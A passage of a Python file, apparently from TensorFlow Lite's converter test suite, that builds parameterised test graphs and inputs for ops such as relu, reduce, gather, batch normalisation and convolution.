  # Choose a set of parameters
test_parameters = [{
"input_shape": [[], [1], [3, 3]],
"use_snapshot": [False, True],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
    # We add the Multiply before Identity just as a workaround to make the
    # test pass when input_shape is scalar.
    # During graph transformation, TOCO will replace the Identity op with
    # Reshape when input has shape. However, currently TOCO can't distinguish
    # between missing shape and scalar shape. As a result, when input has
    # scalar shape, this conversion still fails.
    # TODO(b/129197312), remove the workaround code once the bug is fixed.
input_doubled = input_tensor * 2.0
if parameters["use_snapshot"]:
identity_output = array_ops.snapshot(input_doubled)
else:
identity_output = tf.identity(input_doubled)
return [input_tensor], [identity_output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_relu_tests(options):
"""Make a set of tests to do relu."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[], [1], [2, 3], [1, 1, 1, 1], [1, 3, 4, 3],
[3, 15, 14, 3], [3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.relu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_relu1_tests(options):
"""Make a set of tests to do relu1."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[], [1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3],
[3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
# Note that the following is not supported:
# out = tf.maximum(-1.0, tf.minimum(input_tensor, 1.0))
out = tf.minimum(1.0, tf.maximum(input_tensor, -1.0))
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-3, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_relu6_tests(options):
"""Make a set of tests to do relu6."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[], [1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3],
[3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
    out = tf.nn.relu6(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-3, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_prelu_tests(options):
"""Make a set of tests to do PReLU."""
test_parameters = [
{
        # The canonical case for image processing is having a 4D `input`
        # (NHWC) and `shared_axes`=[1, 2], so the alpha parameter is per
        # channel.
"input_shape": [[1, 10, 10, 3], [3, 3, 3, 3]],
"shared_axes": [[1, 2], [1]],
},
{
# 2D-3D example. Share the 2nd axis.
"input_shape": [[20, 20], [20, 20, 20]],
"shared_axes": [[1]],
}
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
prelu = tf.keras.layers.PReLU(shared_axes=parameters["shared_axes"])
out = prelu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build the inputs for the test case."""
input_shape = parameters["input_shape"]
input_values = create_tensor_data(
np.float32, input_shape, min_value=-10, max_value=10)
shared_axes = parameters["shared_axes"]
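    # The PReLU alpha (slope) tensor skips the batch dimension: axes listed in
    # `shared_axes` collapse to size 1, every other axis keeps the input size,
    # which is why the loop below starts at dim 1.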
alpha_shape = []
for dim in range(1, len(input_shape)):
alpha_shape.append(1 if dim in shared_axes else input_shape[dim])
alpha_values = create_tensor_data(np.float32, alpha_shape)
# There should be only 1 trainable variable tensor.
variables = tf.all_variables()
assert len(variables) == 1
sess.run(variables[0].assign(alpha_values))
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function()
def make_leaky_relu_tests(options):
"""Make a set of tests to do LeakyRelu."""
test_parameters = [
{
"input_shape": [[], [1], [5], [1, 10, 10, 3], [3, 3, 3, 3]],
"alpha": [0.1, 1.0, 2.0, -0.1, -1.0, -2.0],
},
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.leaky_relu(input_tensor, alpha=parameters["alpha"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build the inputs for the test case."""
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-3, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# This function tests various TensorFlow functions that generate a Const op,
# including `tf.ones`, `tf.zeros` and random functions.
@register_make_test_function()
def make_constant_tests(options):
"""Make a set of tests to do constant ops."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[], [1], [2], [1, 1, 1, 1], [2, 2, 2, 2]],
"constant_is_also_output": [True, False],
# This is a regression test for a bug where Toco rejects models with
# unread inputs.
"has_unread_input": [True, False],
}]
def build_graph(parameters):
dummy_input = tf.placeholder(
dtype=parameters["dtype"],
name="input1",
shape=parameters["input_shape"])
constant = tf.constant(
create_tensor_data(parameters["dtype"], parameters["input_shape"]))
outputs = [tf.maximum(dummy_input, constant)]
if parameters["constant_is_also_output"]:
outputs.append(constant)
inputs = [dummy_input]
if parameters["has_unread_input"]:
unread_input = tf.placeholder(
dtype=parameters["dtype"],
name="unread_input",
shape=parameters["input_shape"])
inputs.append(unread_input)
return inputs, outputs
def build_inputs(parameters, sess, inputs, outputs):
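    # The placeholder input is a dummy filled with zeros; the test targets the
    # constant op. `_TF_TYPE_INFO` (defined earlier in this file) is used to
    # look up the numpy dtype that matches the TensorFlow dtype.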
dummy_input = np.zeros(
parameters["input_shape"], dtype=_TF_TYPE_INFO[parameters["dtype"]][0])
return [dummy_input], sess.run(outputs, feed_dict={inputs[0]: dummy_input})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
def make_binary_op_tests(options, binary_operator, expected_tf_failures=0):
"""Make a set of tests to do binary ops with and without broadcast."""
test_parameters = [
# Avoid creating all combinations to keep the test size small.
{
"dtype": [tf.float32, tf.int32],
"input_shape_1": [[1, 3, 4, 3]],
"input_shape_2": [[1, 3, 4, 3]],
"activation": [True],
},
{
"dtype": [tf.float32],
"input_shape_1": [[5]],
"input_shape_2": [[5]],
"activation": [False, True],
},
{
"dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_1": [[1, 3, 4, 3]],
"input_shape_2": [[3]],
"activation": [True, False],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape_1": [[3]],
"input_shape_2": [[1, 3, 4, 3]],
"activation": [True, False],
},
{
"dtype": [tf.float32],
"input_shape_1": [[]],
"input_shape_2": [[]],
"activation": [False],
},
{
"dtype": [tf.float32],
"input_shape_1": [[0]],
"input_shape_2": [[1]],
"activation": [False],
}
]
def build_graph(parameters):
"""Builds the graph given the current parameters."""
input1 = tf.placeholder(
dtype=parameters["dtype"],
name="input1",
shape=parameters["input_shape_1"])
input2 = tf.placeholder(
dtype=parameters["dtype"],
name="input2",
shape=parameters["input_shape_2"])
out = binary_operator(input1, input2)
if parameters["activation"]:
out = tf.nn.relu(out)
return [input1, input2], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Builds operand inputs for op."""
input1 = create_tensor_data(parameters["dtype"],
parameters["input_shape_1"])
input2 = create_tensor_data(parameters["dtype"],
parameters["input_shape_2"])
return [input1, input2], sess.run(
outputs, feed_dict={
inputs[0]: input1,
inputs[1]: input2
})
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
def make_reduce_tests(reduce_op,
min_value=-10,
max_value=10,
boolean_tensor_only=False):
"""Make a set of tests to do reduce operation.
Args:
reduce_op: TensorFlow reduce operation to test, i.e. `tf.reduce_mean`.
min_value: min value for created tensor data.
max_value: max value for created tensor data.
boolean_tensor_only: If true, will only generate tensor with boolean value.
Returns:
a function representing the true generator with `reduce_op_in` curried.
"""
def f(options):
"""Actual function that generates examples."""
test_parameters = [
{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape": [[3, 3, 2, 4]],
"axis": [
0, 1, 2, [0, 1], [0, 2], [1, 2], [0, 1, 2], [1, 0], [2, 0],
[2, 1], [2, 1, 0], [2, 0, 1], -1, -2, -3, [1, -1], [0, -1],
[-1, 0], [-1, -2, -3], [0, 0, 0], [2, 2, 0], [1, 0, -3, -3]
],
"const_axis": [True, False],
"keepdims": [True, False],
},
{
"input_dtype": [tf.float32],
"input_shape": [[1, 8, 8, 3]],
"axis": [
                0, 1, 2, 3, [1, 2], [0, 3], [1, 2, 3], [0, 1, 2, 3],
                [3, 2, 1, 0], [3, 1, 0, 2], [2, 0], [3, 0], [3, 1], [1, 0],
                -1, -2, -3, -4, [0, -2], [2, 3, -1, 0], [3, 1, 2, -3],
                [3, -4], [2, 2, 2], [2, 2, 3], [-3, -3, -4], [-3, 2, 1]
],
"const_axis": [True, False],
"keepdims": [True, False],
},
{
"input_dtype": [tf.float32],
"input_shape": [[], [1, 8, 8, 3], [3, 2, 4]],
"axis": [[]], # shape is: [0]
"const_axis": [False],
"keepdims": [True, False],
},
{
"input_dtype": [tf.float32],
"input_shape": [[], [1, 8, 8, 3], [3, 2, 4]],
"axis": [None], # shape is: []
"const_axis": [True],
"keepdims": [True, False],
}
]
def build_graph(parameters):
"""Build the mean op testing graph."""
dtype = parameters["input_dtype"]
if boolean_tensor_only:
dtype = tf.bool
input_tensor = tf.placeholder(
dtype=dtype, name="input", shape=parameters["input_shape"])
# Get axis as either a placeholder or constants.
if parameters["const_axis"]:
axis = parameters["axis"]
input_tensors = [input_tensor]
else:
if isinstance(parameters["axis"], list):
shape = [len(parameters["axis"])]
else:
shape = [] # shape for None or integers.
axis = tf.placeholder(dtype=tf.int32, name="axis", shape=shape)
input_tensors = [input_tensor, axis]
out = reduce_op(
input_tensor, axis=axis, keepdims=parameters["keepdims"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
dtype = parameters["input_dtype"]
if boolean_tensor_only:
dtype = tf.bool
values = [
create_tensor_data(
dtype,
parameters["input_shape"],
min_value=min_value,
max_value=max_value)
]
if not parameters["const_axis"]:
values.append(np.array(parameters["axis"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
return f
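# Illustrative sketch only (not part of the original file): the factory above
# is curried with a concrete reduce op and later called with the generation
# options, exactly like the registered wrappers below, e.g.
#
#   make_my_reduce_tests = make_reduce_tests(tf.reduce_max, min_value=-5,
#                                            max_value=5)
#   make_my_reduce_tests(options)  # writes the zip of test examples
#
# `make_my_reduce_tests` is a hypothetical name used only for illustration.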
@register_make_test_function()
def make_mean_tests(options):
"""Make a set of tests to do mean."""
return make_reduce_tests(tf.reduce_mean)(options)
@register_make_test_function()
def make_sum_tests(options):
"""Make a set of tests to do sum."""
return make_reduce_tests(tf.reduce_sum)(options)
@register_make_test_function()
def make_reduce_prod_tests(options):
"""Make a set of tests to do prod."""
  # Set the min/max values to -2 and 2 to avoid overflow.
return make_reduce_tests(tf.reduce_prod, -2, 2)(options)
@register_make_test_function()
def make_reduce_max_tests(options):
"""Make a set of tests to do max."""
return make_reduce_tests(tf.reduce_max)(options)
@register_make_test_function()
def make_reduce_min_tests(options):
"""Make a set of tests to do min."""
return make_reduce_tests(tf.reduce_min)(options)
@register_make_test_function()
def make_reduce_any_tests(options):
"""Make a set of tests to do any."""
return make_reduce_tests(tf.reduce_any, boolean_tensor_only=True)(options)
@register_make_test_function()
def make_exp_tests(options):
"""Make a set of tests to do exp."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the exp op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.exp(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"], parameters["input_shape"],
min_value=-100, max_value=9)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_cos_tests(options):
"""Make a set of tests to do cos."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the cos op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.cos(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"], parameters["input_shape"],
min_value=-np.pi, max_value=np.pi)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_log_softmax_tests(options):
"""Make a set of tests to do log_softmax."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[1, 100], [4, 2], [5, 224]],
}]
def build_graph(parameters):
"""Build the log_softmax op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.nn.log_softmax(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(
parameters["input_dtype"],
parameters["input_shape"],
min_value=-100,
max_value=9)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_maximum_tests(options):
"""Make a set of tests to do maximum."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape_1": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
"input_shape_2": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the maximum op testing graph."""
input_tensor_1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_1",
shape=parameters["input_shape_1"])
input_tensor_2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_2",
shape=parameters["input_shape_2"])
out = tf.maximum(input_tensor_1, input_tensor_2)
return [input_tensor_1, input_tensor_2], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_1"]),
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_2"])
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=8)
@register_make_test_function()
def make_minimum_tests(options):
"""Make a set of tests to do minimum."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape_1": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
"input_shape_2": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the minimum op testing graph."""
input_tensor_1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_1",
shape=parameters["input_shape_1"])
input_tensor_2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_2",
shape=parameters["input_shape_2"])
out = tf.minimum(input_tensor_1, input_tensor_2)
return [input_tensor_1, input_tensor_2], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_1"]),
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_2"])
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=8)
def make_binary_op_tests_func(binary_operator):
"""Return a function that does a test on a binary operator."""
return lambda options: make_binary_op_tests(options, binary_operator)
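# Illustrative sketch only (assumption, not original code): a new elementwise
# operator would be hooked up the same way the wrappers below do it, either
# through this factory or by calling make_binary_op_tests directly, e.g.
#
#   @register_make_test_function()
#   def make_my_binary_op_tests(options):
#     make_binary_op_tests(options, tf.my_binary_op)  # hypothetical operator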
@register_make_test_function()
def make_add_tests(options):
make_binary_op_tests(options, tf.add)
@register_make_test_function()
def make_add_n_tests(options):
"""Make a set of tests for AddN op."""
test_parameters = [
{
"dtype": [tf.float32, tf.int32],
"input_shape": [[2, 5, 3, 1]],
"num_inputs": [2, 3, 4, 5],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape": [[5]],
"num_inputs": [2, 3, 4, 5],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape": [[]],
"num_inputs": [2, 3, 4, 5],
},
]
def build_graph(parameters):
"""Builds the graph given the current parameters."""
input_tensors = []
for i in range(parameters["num_inputs"]):
input_tensors.append(
tf.placeholder(
dtype=parameters["dtype"],
name="input_{}".format(i),
shape=parameters["input_shape"]))
out = tf.add_n(input_tensors)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Builds operand inputs for op."""
input_data = []
for i in range(parameters["num_inputs"]):
input_data.append(
create_tensor_data(parameters["dtype"], parameters["input_shape"]))
return input_data, sess.run(
outputs, feed_dict={i: d for i, d in zip(inputs, input_data)})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_div_tests(options):
make_binary_op_tests(options, tf.div)
@register_make_test_function()
def make_sub_tests(options):
make_binary_op_tests(options, tf.subtract)
@register_make_test_function()
def make_mul_tests(options):
make_binary_op_tests(options, tf.multiply)
@register_make_test_function()
def make_pow_tests(options):
make_binary_op_tests(options, tf.pow, expected_tf_failures=7)
@register_make_test_function()
def make_floor_div_tests(options):
make_binary_op_tests(options, tf.floor_div)
@register_make_test_function()
def make_floor_mod_tests(options):
make_binary_op_tests(options, tf.floormod)
@register_make_test_function()
def make_squared_difference_tests(options):
make_binary_op_tests(options, tf.squared_difference)
@register_make_test_function()
def make_gather_tests(options):
"""Make a set of tests to do gather."""
test_parameters = [
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[10], [1, 2, 20]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[3], [5]],
"axis": [-1, 0, 1],
},
{
# TODO(b/123895910): add Nd support for strings.
"params_dtype": [tf.string],
"params_shape": [[8]],
"indices_dtype": [tf.int32],
"indices_shape": [[3]],
"axis": [0],
}
]
def build_graph(parameters):
"""Build the gather op testing graph."""
params = tf.placeholder(
dtype=parameters["params_dtype"],
name="params",
shape=parameters["params_shape"])
indices = tf.placeholder(
dtype=parameters["indices_dtype"],
name="indices",
shape=parameters["indices_shape"])
axis = min(len(parameters["params_shape"]), parameters["axis"])
out = tf.gather(params, indices, axis=axis)
return [params, indices], [out]
def build_inputs(parameters, sess, inputs, outputs):
params = create_tensor_data(parameters["params_dtype"],
parameters["params_shape"])
indices = create_tensor_data(parameters["indices_dtype"],
parameters["indices_shape"], 0,
parameters["params_shape"][0] - 1)
return [params, indices], sess.run(
outputs, feed_dict=dict(zip(inputs, [params, indices])))
  # Note that TF can't execute with axis=1 and params_shape=[10].
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=12)
@register_make_test_function()
def make_gather_nd_tests(options):
"""Make a set of tests to do gather_nd."""
test_parameters = [
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[5, 1]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[1, 1]],
},
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[5, 5]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[2, 1], [2, 2]],
},
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[5, 5, 10]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[3, 1], [2, 2], [2, 3], [2, 1, 3]],
},
]
def build_graph(parameters):
"""Build the gather_nd op testing graph."""
params = tf.placeholder(
dtype=parameters["params_dtype"],
name="params",
shape=parameters["params_shape"])
indices = tf.placeholder(
dtype=parameters["indices_dtype"],
name="indices",
shape=parameters["indices_shape"])
out = tf.gather_nd(params, indices)
return [params, indices], [out]
def build_inputs(parameters, sess, inputs, outputs):
params = create_tensor_data(parameters["params_dtype"],
parameters["params_shape"])
indices = create_tensor_data(parameters["indices_dtype"],
parameters["indices_shape"], 0,
parameters["params_shape"][0] - 1)
return [params, indices], sess.run(
outputs, feed_dict=dict(zip(inputs, [params, indices])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_gather_with_constant_tests(options):
"""Make a set of test which feed a constant to gather toco."""
test_parameters = [{
"input_shape": [[3]],
"reference_shape": [[2]],
}, {
"input_shape": [[2, 3]],
"reference_shape": [[2, 3]],
}]
def build_graph(parameters):
"""Build a graph where the inputs to Gather are constants."""
reference = tf.placeholder(
dtype=tf.int32, shape=parameters["reference_shape"])
gather_input = tf.constant(
create_tensor_data(tf.int32, parameters["input_shape"]))
gather_indices = tf.constant([0, 1], tf.int32)
out = tf.equal(reference, tf.gather(gather_input, gather_indices))
return [reference], [out]
def build_inputs(parameters, sess, inputs, outputs):
reference_values = np.zeros(parameters["reference_shape"], dtype=np.int32)
return [reference_values], sess.run(
outputs, feed_dict={inputs[0]: reference_values})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_embedding_lookup_tests(options):
"""Make a set of tests to do gather."""
test_parameters = [
{
"params_dtype": [tf.float32],
"params_shape": [[10], [10, 10]],
"ids_dtype": [tf.int32],
"ids_shape": [[3], [5]],
},
]
def build_graph(parameters):
"""Build the gather op testing graph."""
params = tf.placeholder(
dtype=parameters["params_dtype"],
name="params",
shape=parameters["params_shape"])
ids = tf.placeholder(
dtype=parameters["ids_dtype"],
name="ids",
shape=parameters["ids_shape"])
out = tf.nn.embedding_lookup(params, ids)
return [params, ids], [out]
def build_inputs(parameters, sess, inputs, outputs):
params = create_tensor_data(parameters["params_dtype"],
parameters["params_shape"])
ids = create_tensor_data(parameters["ids_dtype"],
parameters["ids_shape"], 0,
parameters["params_shape"][0] - 1)
return [params, ids], sess.run(
outputs, feed_dict=dict(zip(inputs, [params, ids])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs)
@register_make_test_function()
def make_global_batch_norm_tests(options):
"""Make a set of tests to do batch_norm_with_global_normalization."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 1, 6, 2], [3, 4, 5, 4]],
"epsilon": [0.1, 0.0001],
"scale_after": [True, False],
}]
def build_graph(parameters):
"""Build the global batch norm testing graph."""
input_shape = parameters["input_shape"]
scale_shape = input_shape[3]
scale = create_tensor_data(parameters["dtype"], scale_shape)
offset = create_tensor_data(parameters["dtype"], scale_shape)
mean = create_tensor_data(parameters["dtype"], scale_shape)
variance = create_tensor_data(parameters["dtype"], scale_shape)
x = create_tensor_data(parameters["dtype"], parameters["input_shape"])
x_norm = tf.nn.batch_norm_with_global_normalization(
x, mean, variance, scale, offset,
parameters["epsilon"], parameters["scale_after"])
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.add(input_tensor, x_norm)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_fused_batch_norm_tests(options):
"""Make a set of tests to do fused_batch_norm."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 1, 6, 2]],
"epsilon": [0.001, 0.1],
}]
def build_graph(parameters):
"""Build the testing graph for fused batch normalization."""
input_shape = parameters["input_shape"]
scale_shape = input_shape[3]
scale = create_tensor_data(parameters["dtype"], scale_shape)
offset = create_tensor_data(parameters["dtype"], scale_shape)
mean = create_tensor_data(parameters["dtype"], scale_shape)
variance = create_tensor_data(parameters["dtype"], scale_shape)
x = create_tensor_data(parameters["dtype"], parameters["input_shape"])
[x_norm, _, _] = tf.nn.fused_batch_norm(
x, scale, offset, mean, variance,
parameters["epsilon"], data_format="NHWC", is_training=False)
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.add(input_tensor, x_norm)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_conv_tests(options):
"""Make a set of tests to do convolution."""
test_parameters = [
{
"input_shape": [[1, 3, 4, 3], [4, 6, 6, 1]],
"filter_shape": [[1, 1], [2, 3], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 2, 3, 1]],
"dilations": [[1, 1, 1, 1], [1, 3, 2, 1], [1, 2, 2, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"], # TODO(aselle): NCHW would be good
"constant_filter": [True, False],
"channel_multiplier": [1, 2],
"fully_quantize": [False],
},
# TODO(b/134702301): The fully_quantize param is just ignored by the MLIR
# testing path now, resulting in duplicate tests. Either ignore these
# tests or handle it properly in the mlir_convert() function.
{
"input_shape": [[1, 3, 4, 3], [4, 6, 6, 1]],
"filter_shape": [[1, 1], [2, 3], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 2, 3, 1]],
"dilations": [[1, 1, 1, 1], [1, 3, 2, 1], [1, 2, 2, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"], # TODO(aselle): NCHW would be good
"constant_filter": [True],
"channel_multiplier": [1, 2],
"fully_quantize": [True],
}
]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_shape"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
# Get filter input either as a placeholder or constants. Also get a list of
# the input tensors that are represented as placeholders.
if parameters["constant_filter"]:
filter_input = create_tensor_data(
np.float32, filter_shape, min_value=-10, max_value=10)
input_tensors = [input_tensor]
else:
filter_input = tf.placeholder(
dtype=tf.float32, name="filter", shape=filter_shape)
input_tensors = [input_tensor, filter_input]
out = tf.nn.conv2d(
input_tensor,
filter_input,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, filter_shape = get_tensor_shapes(parameters)
values = [
create_tensor_data(np.float32, input_shape, min_value=-1, max_value=1)
]
if not parameters["constant_filter"]:
values.append(create_tensor_data(np.float32, filter_shape))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=60)
# Note: This is a regression test for a bug (b/122651451) where Toco
# incorrectly erased the reduction indices array while it was shared with
# other ops.
@register_make_test_function()
def make_l2norm_shared_epsilon_tests(options):
"""Regression test for a bug (b/122651451)."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[5, 7]],
"dim": [1],
"epsilon": [1e-8],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
epsilon = tf.constant(parameters["epsilon"])
out1 = tf.nn.l2_normalize(input_tensor, parameters["dim"], epsilon=epsilon)
out2 = tf.nn.l2_normalize(input_tensor, parameters["dim"], epsilon=epsilon)
out = out1 + out2
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# Note: This is a regression test for a bug (b/112436267) where Toco
# incorrectly fused weights when multiple Conv2D/FULLY_CONNECTED ops share the
# same constant weight tensor.
@register_make_test_function()
def make_conv_with_shared_weights_tests(options):
"""Make a test where 2 Conv ops shared the same constant weight tensor."""
test_parameters = [{
"input_shape": [[1, 10, 10, 3]],
"filter_shape": [[3, 3]],
"strides": [[1, 1, 1, 1]],
"dilations": [[1, 1, 1, 1]],
"padding": ["SAME"],
"data_format": ["NHWC"],
"channel_multiplier": [1],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_shape"]
